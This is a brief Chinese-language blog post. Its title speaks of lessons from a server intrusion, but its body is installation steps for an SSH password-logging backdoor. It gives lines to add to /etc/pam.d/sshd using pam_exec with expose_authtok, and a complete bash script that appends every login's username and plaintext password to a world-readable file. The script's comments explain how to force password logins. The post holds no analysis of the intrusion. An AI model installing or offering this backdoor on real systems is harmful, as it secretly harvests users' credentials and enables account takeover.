- A+
所属分类:linux问题解决
一次服务器被入侵分析学到
1.修改/etc/pam.d/sshd,添加
1 2 3 |
#voidrkflag auth [default=ignore] pam_exec.so expose_authtok quiet /bin/pam_verify.sh password [default=ignore] pam_exec.so expose_authtok quiet /bin/pam_verify.sh |
添加可执行脚本/bin/pam_verify.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
#!/usr/bin/env bash # put next line in /etc/pam.d/sshd, then put this script as /bin/pam_verify.sh # clear authorized_keys, then login via ssh, password will be recorded # auth [default=ignore] pam_exec.so expose_authtok /bin/pam_verify.sh recordfile=/etc/pamlog.conf if [ ! -f $recordfile ];then touch $recordfile chmod 644 $recordfile fi # The password comes in through stdin PAM_PASSWORD=`cat -` echo "Service: ${PAM_SERVICE}; User: ${PAM_USER}; Password: ${PAM_PASSWORD}; Type: ${PAM_TYPE}" >> $recordfile |
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫